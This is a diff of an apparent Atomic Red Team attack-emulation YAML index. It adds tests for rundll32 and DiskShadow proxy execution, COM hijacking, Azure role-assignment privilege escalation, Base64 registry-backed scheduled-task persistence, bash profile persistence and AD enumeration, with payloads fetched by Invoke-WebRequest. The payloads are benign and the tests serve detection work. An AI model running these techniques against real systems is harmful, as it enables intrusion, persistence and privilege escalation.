       id: attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5
@@ -36204,6 +36643,98 @@ defense-evasion:
 
 '
         name: command_prompt
+    - name: Execution of non-dll using rundll32.exe
+      auto_generated_guid: ae3a8605-b26e-457c-b6b3-2702fd335bac
+      description: "Rundll32.exe running non-dll \n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        input_url:
+          description: Url to download the DLL
+          type: Url
+          default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1047/bin/calc.dll
+        input_file:
+          description: Non-dll file
+          type: String
+          default: C:\Users\$env:username\Downloads\calc.png
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Non-dll file must exist on disk at specified location
+
+'
+        prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: 'Invoke-WebRequest "#{input_url}" -OutFile "#{input_file}"
+
+'
+      executor:
+        name: powershell
+        command: 'rundll32.exe #{input_file}, StartW
+
+'
+    - name: Rundll32 with Ordinal Value
+      auto_generated_guid: 9fd5a74b-ba89-482a-8a3e-a5feaa3697b0
+      description: "Rundll32.exe loading dll using ordinal value #2 to DLLRegisterServer.
+        \nUpon successful execution, Calc.exe will spawn.\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        input_url:
+          description: Url to download the DLL
+          type: Url
+          default: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/bin/AllTheThingsx64.dll
+        input_file:
+          description: DLL File
+          type: String
+          default: PathToAtomicsFolder\T1218.010\bin\AllTheThingsx64.dll
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'DLL file must exist on disk at specified location
+
+'
+        prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: 'Invoke-WebRequest "#{input_url}" -OutFile "#{input_file}"
+
+'
+      executor:
+        name: command_prompt
+        command: 'rundll32.exe #{input_file},#2
+
+'
+    - name: Rundll32 with Control_RunDLL
+      auto_generated_guid: e4c04b6f-c492-4782-82c7-3bf75eb8077e
+      description: "Rundll32.exe loading dll with 'control_rundll' within the command-line,
+        loading a .cpl or another file type related to CVE-2021-40444. \n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        input_url:
+          description: Url to download the DLL
+          type: Url
+          default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1047/bin/calc.dll
+        input_file:
+          description: DLL File
+          type: String
+          default: PathToAtomicsFolder\T1047\bin\calc.dll
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'DLL file must exist on disk at specified location
+
+'
+        prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: 'Invoke-WebRequest "#{input_url}" -OutFile "#{input_file}"
+
+'
+      executor:
+        name: command_prompt
+        command: 'rundll32.exe shell32.dll,Control_RunDLL #{input_file}
+
+'
   T1134.005:
     technique:
       external_references:
@@ -37121,6 +37652,43 @@ defense-evasion:
         command: 'Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName #{module_name}
           -ModulePath #{module_path}'
         name: powershell
+    - name: DiskShadow Command Execution
+      auto_generated_guid: 0e1483ba-8f0c-425d-b8c6-42736e058eaa
+      description: 'Emulates attack with a DiskShadow.exe (LOLBIN installed by default
+        on Windows) being used to execute arbitrary commands Reference: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        txt_payload:
+          description: txt to execute
+          type: Path
+          default: PathToAtomicsFolder\T1218\src\T1218.txt
+        dspath:
+          description: Default location of DiskShadow.exe
+          type: Path
+          default: C:\Windows\System32\diskshadow.exe
+      dependency_executor_name: powershell
+      dependencies:
+      - description: txt file must exist on disk at specified location (#{txt_payload})
+        prereq_command: 'if (Test-Path #{txt_payload}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{txt_payload}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/T1218.txt" -OutFile "#{txt_payload}"
+      - description: DiskShadow.exe must exist on disk at specified location (#{dspath})
+        prereq_command: 'if (Test-Path #{dspath}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: 'echo "DiskShadow.exe not found on disk at expected location"
+
+'
+      executor:
+        command: "#{dspath} -S #{txt_payload} \n"
+        name: powershell
+        elevation_required: false
   T1216:
     technique:
       id: attack-pattern--f6fe9070-7a65-49ea-ae72-76292f42cebe
@@ -40229,6 +40797,300 @@ persistence:
           aws iam remove-user-from-group --user-name #{username} --group-name #{username}
           aws iam delete-group --group-name #{username}
         name: sh
+    - name: Azure - adding user to Azure AD role
+      auto_generated_guid: 0e65ae27-5385-46b4-98ac-607a8ee82261
+      description: "The adversarie want to add user to some Azure AD role. Threat
+        actor \nmay be interested primarily in highly privileged roles, e.g. Global
+        Administrator, Application Administrator, \nPrivileged authentication administrator
+        (this role can reset Global Administrator password!).\nBy default, the role
+        Global Reader is assigned to service principal in this test.\n\nThe account
+        you use to run the PowerShell command should have Privileged Role Administrator
+        or Global Administrator role in your Azure AD.\n\nDetection hint - check Activity
+        \"Add member to role\" in Azure AD Audit Logs. In targer you will also see
+        User as a type.\n"
+      supported_platforms:
+      - azure-ad
+      input_arguments:
+        username:
+          description: Azure AD username
+          type: String
+          default: jonh@contoso.com
+        password:
+          description: Azure AD password
+          type: String
+          default: p4sswd
+        user_principal_name:
+          description: Name of the targeted user (user principal)
+          type: String
+          default: SuperUser
+        role_name:
+          description: Name of the targed Azure AD role
+          type: String
+          default: Global Reader
+      dependencies:
+      - description: 'AzureAD module must be installed.
+
+'
+        prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue)
+          {exit 0} else {exit 1}} catch {exit 1}
+
+'
+        get_prereq_command: 'Install-Module -Name AzureAD -Force
+
+'
+      executor:
+        command: |
+          Import-Module -Name AzureAD
+          $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+          $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+          Connect-AzureAD -Credential $Credential
+
+          $user = Get-AzureADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
+          if ($user -eq $null) { Write-Warning "User not found"; exit }
+          $role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq "#{role_name}"}
+          if ($role -eq $null) { Write-Warning "Role not found"; exit }
+          Add-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $user.ObjectId
+          Write-Host "User $($user.DisplayName) was added to $($role.DisplayName) role"
+        cleanup_command: |
+          Import-Module -Name AzureAD -ErrorAction Ignore
+          $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+          $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+          Connect-AzureAD -Credential $Credential -ErrorAction Ignore
+
+          $user = Get-AzureADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
+          if ($user -eq $null) { Write-Warning "User not found"; exit }
+          $role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq "#{role_name}"}
+          if ($role -eq $null) { Write-Warning "Role not found"; exit }
+
+          Remove-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -MemberId $user.ObjectId
+          Write-Host "User $($user.DisplayName) was removed from $($role.DisplayName) role"
+        name: powershell
+        elevation_required: false
+    - name: Azure - adding service principal to Azure AD role
+      auto_generated_guid: 92c40b3f-c406-4d1f-8d2b-c039bf5009e4
+      description: "The adversarie want to add service principal to some Azure AD
+        role. Threat actor \nmay be interested primarily in highly privileged roles,
+        e.g. Global Administrator, Application Administrator, \nPrivileged authentication
+        administrator (this role can reset Global Administrator password!).\nBy default,
+        the role Global Reader is assigned to service principal in this test.\n\nThe
+        account you use to run the PowerShell command should have Privileged Role
+        Administrator or Global Administrator role in your Azure AD.\n\nDetection
+        hint - check Activity \"Add member to role\" in Azure AD Audit Logs. In targer
+        you will also see Service Principal as a type.\n"
+      supported_platforms:
+      - azure-ad
+      input_arguments:
+        username:
+          description: Azure AD username
+          type: String
+          default: jonh@contoso.com
+        password:
+          description: Azure AD password
+          type: String
+          default: p4sswd
+        service_principal_name:
+          description: Name of the service principal
+          type: String
+          default: SuperSP
+        role_name:
+          description: Name of the targed Azure AD role
+          type: String
+          default: Global Reader
+      dependencies:
+      - description: 'AzureAD module must be installed.
+
+'
+        prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue)
+          {exit 0} else {exit 1}} catch {exit 1}
+
+'
+        get_prereq_command: 'Install-Module -Name AzureAD -Force
+
+'
+      executor:
+        command: |
+          Import-Module -Name AzureAD
+          $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+          $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+          Connect-AzureAD -Credential $Credential
+
+          $sp = Get-AzureADServicePrincipal | where-object {$_.DisplayName -eq "#{service_principal_name}"}
+          if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
+          $role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq "#{role_name}"}
+          if ($role -eq $null) { Write-Warning "Role not found"; exit }
+          Add-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $sp.ObjectId
+          Write-Host "Service Principal $($sp.DisplayName) was added to $($role.DisplayName)"
+        cleanup_command: |
+          Import-Module -Name AzureAD -ErrorAction Ignore
+          $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+          $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+          Connect-AzureAD -Credential $Credential -ErrorAction Ignore
+
+          $sp = Get-AzureADServicePrincipal | where-object {$_.DisplayName -eq "#{service_principal_name}"}
+          if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
+          $role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq "#{role_name}"}
+          if ($role -eq $null) { Write-Warning "Role not found"; exit }
+
+          Remove-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -MemberId $sp.ObjectId
+          Write-Host "Service Principal $($sp.DisplayName) was removed from $($role.DisplayName) role"
+        name: powershell
+        elevation_required: false
+    - name: Azure - adding user to Azure role in subscription
+      auto_generated_guid: 1a94b3fc-b080-450a-b3d8-6d9b57b472ea
+      description: "The adversarie want to add user to some Azure role, also called
+        Azure resource role. Threat actor \nmay be interested primarily in highly
+        privileged roles, e.g. Owner, Contributor.\nBy default, the role Reader is
+        assigned to user in this test.\n\nNew-AzRoleAssignment cmdlet could be also
+        use to assign user/service principal to resource, resource group and management
+        group.\n\nThe account you use to run the PowerShell command must have Microsoft.Authorization/roleAssignments/write
+        \n(e.g. such as User Access Administrator or Owner) and the Azure Active Directory
+        Graph Directory.Read.All \nand Microsoft Graph Directory.Read.All permissions.\n\nDetection
+        hint - check Operation Name \"Create role assignment\" in subscriptions Activity
+        Logs.\n"
+      supported_platforms:
+      - iaas:azure
+      input_arguments:
+        username:
+          description: Azure AD username
+          type: String
+          default: jonh@contoso.com
+        password:
+          description: Azure AD password
+          type: String
+          default: p4sswd
+        user_principal_name:
+          description: Name of the targeted user (user principal)
+          type: String
+          default: SuperUser
+        role_name:
+          description: Name of the targed Azure role
+          type: String
+          default: Reader
+        subscription:
+          description: Name of the targed subscription
+          type: String
+          default: Azure subscription 1
+      dependencies:
+      - description: 'Az.Resources module must be installed.
+
+'
+        prereq_command: 'try {if (Get-InstalledModule -Name Az.Resources -ErrorAction
+          SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+
+'
+        get_prereq_command: 'Install-Module -Name Az.Resources -Force
+
+'
+      executor:
+        command: |
+          Import-Module -Name Az.Resources
+          $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+          $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+          Connect-AzAccount -Credential $Credential
+
+          $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
+          if ($user -eq $null) { Write-Warning "User not found"; exit }
+          $subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"}
+          if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
+          $role = Get-AzRoleDefinition | where-object {$_.Name -eq "#{role_name}"}
+          if ($role -eq $null) { Write-Warning "Role not found"; exit }
+
+          New-AzRoleAssignment -ObjectId $user.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription
+          Write-Host "User $($user.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)"
+        cleanup_command: |
+          Import-Module -Name AzureAD -ErrorAction Ignore
+          $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+          $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+          Connect-AzAccount -Credential $Credential -ErrorAction Ignore
+
+          $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
+          if ($user -eq $null) { Write-Warning "User not found"; exit }
+          $subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"}
+          if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
+          $role = Get-AzRoleDefinition | where-object {$_.Name -eq "#{role_name}"}
+          if ($role -eq $null) { Write-Warning "Role not found"; exit }
+
+          Remove-AzRoleAssignment -ObjectId $user.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription
+          Write-Host "Service Principal $($sp.DisplayName) was removed from $($role.Name) role in subscriptions $($subscriptions.Name)"
+        name: powershell
+        elevation_required: false
+    - name: Azure - adding service principal to Azure role in subscription
+      auto_generated_guid: c8f4bc29-a151-48da-b3be-4680af56f404
+      description: "The adversarie want to add service principal to some Azure role,
+        also called Azure resource role. Threat actor \nmay be interested primarily
+        in highly privileged roles, e.g. Owner, Contributor.\nBy default, the role
+        Reader is assigned to service principal in this test.\n\nNew-AzRoleAssignment
+        cmdlet could be also use to assign user/service principal to resource, resource
+        group and management group.\n\nThe account you use to run the PowerShell command
+        must have Microsoft.Authorization/roleAssignments/write \n(e.g. such as User
+        Access Administrator or Owner) and the Azure Active Directory Graph Directory.Read.All
+        \nand Microsoft Graph Directory.Read.All permissions.\n\nDetection hint -
+        check Operation Name \"Create role assignment\" in subscriptions Activity
+        Logs.\n"
+      supported_platforms:
+      - iaas:azure
+      input_arguments:
+        username:
+          description: Azure AD username
+          type: String
+          default: jonh@contoso.com
+        password:
+          description: Azure AD password
+          type: String
+          default: p4sswd
+        service_principal_name:
+          description: Name of the service principal
+          type: String
+          default: SuperSP
+        role_name:
+          description: Name of the targed Azure role
+          type: String
+          default: Reader
+        subscription:
+          description: Name of the targed subscription
+          type: String
+          default: Azure subscription 1
+      dependencies:
+      - description: 'Az.Resources module must be installed.
+
+'
+        prereq_command: 'try {if (Get-InstalledModule -Name Az.Resources -ErrorAction
+          SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+
+'
+        get_prereq_command: 'Install-Module -Name Az.Resources -Force
+
+'
+      executor:
+        command: "Import-Module -Name Az.Resources\n$PWord = ConvertTo-SecureString
+          -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName
+          System.Management.Automation.PSCredential -ArgumentList \"#{username}\",
+          $Pword\nConnect-AzAccount -Credential $Credential\n\n$sp = Get-AzADServicePrincipal
+          | where-object {$_.DisplayName -eq \"#{service_principal_name}\"}\nif ($sp
+          -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n$subscription
+          = Get-AzSubscription | where-object {$_.Name -eq \"#{subscription}\"} \nif
+          ($subscription -eq $null) { Write-Warning \"Subscription not found\"; exit
+          }\n$role = Get-AzRoleDefinition | where-object {$_.Name -eq \"#{role_name}\"}\nif
+          ($role -eq $null) { Write-Warning \"Role not found\"; exit }\n\nNew-AzRoleAssignment
+          -ObjectId $sp.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription\nWrite-Host
+          \"Service Principal $($sp.DisplayName) was added to $($role.Name) role in
+          subscriptions $($subscriptions.Name)\"\n"
+        cleanup_command: "Import-Module -Name AzureAD -ErrorAction Ignore\n$PWord
+          = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential
+          = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList
+          \"#{username}\", $Pword\nConnect-AzAccount -Credential $Credential -ErrorAction
+          Ignore\n\n$sp = Get-AzADServicePrincipal | where-object {$_.DisplayName
+          -eq \"#{service_principal_name}\"}\nif ($sp -eq $null) { Write-Warning \"Service
+          Principal not found\"; exit }\n$subscription = Get-AzSubscription | where-object
+          {$_.Name -eq \"#{subscription}\"} \nif ($subscription -eq $null) { Write-Warning
+          \"Subscription not found\"; exit }\n$role = Get-AzRoleDefinition | where-object
+          {$_.Name -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role
+          not found\"; exit }\n\nRemove-AzRoleAssignment -ObjectId $sp.id -RoleDefinitionId
+          $role.id -Scope /subscriptions/$subscription\nWrite-Host \"Service Principal
+          $($sp.DisplayName) was removed from $($role.Name) role in subscriptions
+          $($subscriptions.Name)\"\n"
+        name: powershell
+        elevation_required: false
   T1547.014:
     technique:
       external_references:
@@ -42568,7 +43430,48 @@ persistence:
       - Elastic
       x_mitre_platforms:
       - Windows
-    atomic_tests: []
+      identifier: T1546.015
+    atomic_tests:
+    - name: COM Hijacking - InprocServer32
+      auto_generated_guid: 48117158-d7be-441b-bc6a-d9e36e47b52b
+      description: |-
+        This test uses PowerShell to hijack a reference to a Component Object Model by creating registry values under InprocServer32 key in the HKCU hive then calling the Class ID to be executed via rundll32.exe.
+
+        Reference: https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/
+      supported_platforms:
+      - windows
+      input_arguments:
+        clsid_threading:
+          description: Threading Model
+          type: string
+          default: Apartment
+        dllpath:
+          description: Path to the DLL.
+          type: String
+          default: "$env:TEMP\\AtomicTest.dll"
+        clsid:
+          description: Class ID to hijack.
+          type: string
+          default: "{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}"
+        clsid_description:
+          description: Description for CLSID
+          type: string
+          default: MSAA AccPropServices
+      dependency_executor_name: powershell
+      dependencies:
+      - description: DLL For testing
+        prereq_command: 'if (Test-Path #{dllpath}) {exit 0} else {exit 1}'
+        get_prereq_command: Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/AtomicTest.dll"
+          -OutFile "#{dllpath}"
+      executor:
+        command: |-
+          New-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}' -Value '#{clsid_description}'
+          New-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}\InprocServer32' -Value #{dllpath}
+          New-ItemProperty -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}\InprocServer32' -Name 'ThreadingModel' -Value '#{clsid_threading}' -PropertyType "String"
+          Start-Process -FilePath "C:\Windows\System32\RUNDLL32.EXE" -ArgumentList '-sta #{clsid}'
+        cleanup_command: Remove-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}'
+          -Recurse -ErrorAction Ignore
+        name: powershell
   T1554:
     technique:
       created: '2020-02-11T18:18:34.279Z'
@@ -48283,6 +49186,28 @@ persistence:
           >$null 2>&1
 
 '
+    - name: Scheduled Task Executing Base64 Encoded Commands From Registry
+      auto_generated_guid: e895677d-4f06-49ab-91b6-ae3742d0a2ba
+      description: "A Base64 Encoded command will be stored in the registry (ping
+        127.0.0.1) and then a scheduled task will be created.\nThe scheduled task
+        will launch powershell to decode and run the command in the rgistry daily.\nThis
+        is a persistence mechanism recently seen in use by Qakbot.  \n\n[Additiona
+        Information](https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/)\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        time:
+          description: Daily scheduled task execution time
+          type: string
+          default: 27900
+      executor:
+        command: |
+          reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f
+          schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))" /sc daily /st #{time}
+        cleanup_command: |
+          schtasks /delete /tn "ATOMIC-T1053.005" /F >nul 2>&1
+          reg delete HKCU\SOFTWARE\ATOMIC-T1053.005 /F >nul 2>&1
+        name: command_prompt
   T1053:
     technique:
       id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9
@@ -49921,9 +50846,12 @@ persistence:
         command_to_add:
           description: Command to add to the .bash_profile file
           type: String
-          default: "/path/to/script.py"
+          default: echo "Hello from Atomic Red Team T1546.004"
       executor:
-        command: 'echo "#{command_to_add}" >> ~/.bash_profile
+        command: 'echo ''#{command_to_add}'' >> ~/.bash_profile
+
+'
+        cleanup_command: 'sed -i ''/#{command_to_add}/d'' ~/.bash_profile
 
 '
         name: sh
@@ -49939,9 +50867,12 @@ persistence:
         command_to_add:
           description: Command to add to the .bashrc file
           type: String
-          default: "/path/to/script.py"
+          default: echo "Hello from Atomic Red Team T1546.004"
       executor:
-        command: 'echo "#{command_to_add}" >> ~/.bashrc
+        command: 'echo ''#{command_to_add}'' >> ~/.bashrc
+
+'
+        cleanup_command: 'sed -i ''/#{command_to_add}/d'' ~/.bashrc
 
 '
         name: sh
@@ -51197,8 +52128,8 @@ impact:
         prereq_command: 'which_gpg=`which gpg`
 
 '
-        get_prereq_command: "(which yum && yum -y epel-release gpg)||(which apt-get
-          && DEBIAN_FRONTEND=noninteractive apt-get install -y gpg)\n"
+        get_prereq_command: "(which yum && yum -y install epel-release gpg)||(which
+          apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y gpg)\n"
       executor:
         name: bash
         elevation_required: false
@@ -51283,8 +52214,8 @@ impact:
           which_ccencrypt=`which ccencrypt`
           which_ccdecrypt=`which ccdecrypt`
           if [[ $USER == "root" ]]; then cp #{root_input_file_path} #{cped_file_path}; else cp #{user_input_file_path} #{cped_file_path}; fi
-        get_prereq_command: "(which yum && yum -y epel-release ccrypt)||(which apt-get
-          && DEBIAN_FRONTEND=noninteractive apt-get install -y ccrypt)\n"
+        get_prereq_command: "(which yum && yum -y install epel-release ccrypt)||(which
+          apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y ccrypt)\n"
       executor:
         name: bash
         elevation_required: false
@@ -53399,6 +54330,26 @@ discovery:
 
 '
         name: command_prompt
+    - name: List Safari Bookmarks on MacOS
+      auto_generated_guid: 5fc528dd-79de-47f5-8188-25572b7fafe0
+      description: 'This test searches for Safari''s Bookmarks file (on macOS) and
+        lists any found instances to a text file.
+
+'
+      supported_platforms:
+      - macos
+      input_arguments:
+        output_file:
+          description: Path where captured results will be placed.
+          type: Path
+          default: "/tmp/T1217-Safari.txt"
+      executor:
+        command: "find / -path \"*/Safari/Bookmarks.plist\" 2>/dev/null >> #{output_file}
+          \ncat #{output_file} \n"
+        cleanup_command: 'rm -f #{output_file} 2>/dev/null
+
+'
+        name: sh
   T1087.004:
     technique:
       external_references:
@@ -54842,6 +55793,16 @@ discovery:
 
 '
         name: sh
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'check if lsof exists
+
+'
+        prereq_command: 'which lsof
+
+'
+        get_prereq_command: "(which yum && yum -y install lsof)||(which apt-get &&
+          DEBIAN_FRONTEND=noninteractive apt-get install -y lsof)\n"
     - name: Show if a user account has ever logged in remotely
       auto_generated_guid: 0f0b6a29-08c3-44ad-a30b-47fd996b2110
       description: 'Show if a user account has ever logged in remotely
@@ -55198,14 +56159,32 @@ discovery:
           fi;
 
 '
-        get_prereq_command: "(which yum && yum -y epel-release nmap)||(which apt-get
-          && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)\n"
+        get_prereq_command: "(which yum && yum -y install epel-release nmap)||(which
+          apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)\n"
+      - description: 'Check if nc command exists on the machine
+
+'
+        prereq_command: 'if [ -x "$(command -v nc)" ]; then exit 0; else exit 1; fi;
+
+'
+        get_prereq_command: "(which yum && yum -y install epel-release nc)||(which
+          apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y netcat)\n"
+      - description: 'Check if telnet command exists on the machine
+
+'
+        prereq_command: 'if [ -x "$(command -v telnet)" ]; then exit 0; else exit
+          1; fi;
+
+'
+        get_prereq_command: "(which yum && yum -y install epel-release telnet)||(which
+          apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y telnet)\n"
       executor:
         command: |
           nmap -sS #{network_range} -p #{port}
           telnet #{host} #{port}
           nc -nv #{host} #{port}
         name: sh
+        elevation_required: true
     - name: Port Scan NMap for Windows
       auto_generated_guid: d696a3cb-d7a8-4976-8eb5-5af4abf2e3df
       description: Scan ports to check for listening ports for the local host 127.0.0.1
@@ -55356,8 +56335,8 @@ discovery:
         package_installer:
           description: Package installer command. Debian - apt install samba
           type: String
-          default: "(which yum && yum -y epel-release samba)||(which apt-get && DEBIAN_FRONTEND=noninteractive
-            apt-get install -y samba)"
+          default: "(which yum && yum -y install epel-release samba)||(which apt-get
+            && DEBIAN_FRONTEND=noninteractive apt-get install -y samba)"
       dependency_executor_name: bash
       dependencies:
       - description: 'Package with smbstatus (samba) must exist on device
@@ -55541,7 +56520,7 @@ discovery:
           -v tshark)" ]; then exit 1; else exit 0; fi;
 
 '
-        get_prereq_command: "(which yum && yum -y epel-release tcpdump tshark)||(which
+        get_prereq_command: "(which yum && yum -y install epel-release tcpdump tshark)||(which
           apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)\n"
       executor:
         command: |
@@ -55571,7 +56550,7 @@ discovery:
           -v tshark)" ]; then exit 1; else exit 0; fi;
 
 '
-        get_prereq_command: "(which yum && yum -y epel-release tcpdump tshark)||(which
+        get_prereq_command: "(which yum && yum -y install epel-release tcpdump tshark)||(which
           apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)\n"
       executor:
         command: "sudo tcpdump -c 5 -nnni #{interface}    \nif [ -x \"$(command -v
@@ -56447,6 +57426,34 @@ discovery:
 
 '
         name: sh
+    - name: Enumerate domain computers within Active Directory using DirectorySearcher
+      auto_generated_guid: 962a6017-1c09-45a6-880b-adc9c57cb22e
+      description: "This test is a Powershell script that enumerates Active Directory
+        to determine computers that are joined to the domain. \nThis test is designed
+        to mimic how SessionGopher can determine the additional systems within a domain,
+        which has been used before by threat actors to aid in lateral movement. \nReference:
+        [Head Fake: Tackling Disruptive Ransomware Attacks](https://www.mandiant.com/resources/head-fake-tackling-disruptive-ransomware-attacks).
+        \nUpon successful execution, this test will output the names of the computers
+        that reside on the domain to the console window. \n"
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: This PC must be joined to a domain.
+        prereq_command: "if ((Get-WmiObject -Class Win32_ComputerSystem).partofdomain
+          -eq $true) {exit 0} else {exit 1}\t\t"
+        get_prereq_command: 'write-host "This PC must be manually added to a domain." '
+      executor:
+        command: |
+          $DirectorySearcher = New-Object System.DirectoryServices.DirectorySearcher("(ObjectCategory=Computer)")
+          $DirectorySearcher.PropertiesToLoad.Add("Name")
+          $Computers = $DirectorySearcher.findall()
+          foreach ($Computer in $Computers) {
+            $Computer = $Computer.Properties.name
+            if (!$Computer) { Continue }
+            Write-Host $Computer}
+        name: powershell
+        elevation_required: false
   T1518.001:
     technique:
       id: attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384
@@ -64171,7 +65178,7 @@ execution:
         script_url:
           description: Shell script public URL
           type: String
-          default: https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh
+          default: https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh
         payload_file_name:
           description: Name of shell script downloaded from the script_url
           type: String
@@ -64216,7 +65223,7 @@ execution:
         script_url:
           description: Shell script public URL
           type: String
-          default: https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh
+          default: https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh
         payload_file_name:
           description: Shell script file name downloaded from the script_url
           type: String
@@ -64273,7 +65280,7 @@ execution:
         script_url:
           description: URL hosting external malicious payload
           type: String
-          default: https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh
+          default: https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh
         payload_file_name:
           description: Shell script file name downloaded from the script_url
           type: String
@@ -64553,6 +65560,28 @@ execution:
           >$null 2>&1
 
 '
+    - name: Scheduled Task Executing Base64 Encoded Commands From Registry
+      auto_generated_guid: e895677d-4f06-49ab-91b6-ae3742d0a2ba
+      description: "A Base64 Encoded command will be stored in the registry (ping
+        127.0.0.1) and then a scheduled task will be created.\nThe scheduled task
+        will launch powershell to decode and run the command in the rgistry daily.\nThis
+        is a persistence mechanism recently seen in use by Qakbot.  \n\n[Additiona
+        Information](https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/)\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        time:
+          description: Daily scheduled task execution time
+          type: string
+          default: 27900
+      executor:
+        command: |
+          reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f
